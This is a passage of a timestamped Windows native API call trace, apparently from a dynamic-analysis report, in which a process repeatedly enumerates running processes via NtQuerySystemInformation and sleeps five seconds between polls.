RegionSize=0xdea68*=0x10000) returned 0x0 [0243.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.788] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.795] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.816] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.832] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.841] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.847] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.854] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.861] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.869] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.876] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.884] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.891] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.898] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.909] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.918] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.925] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.932] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 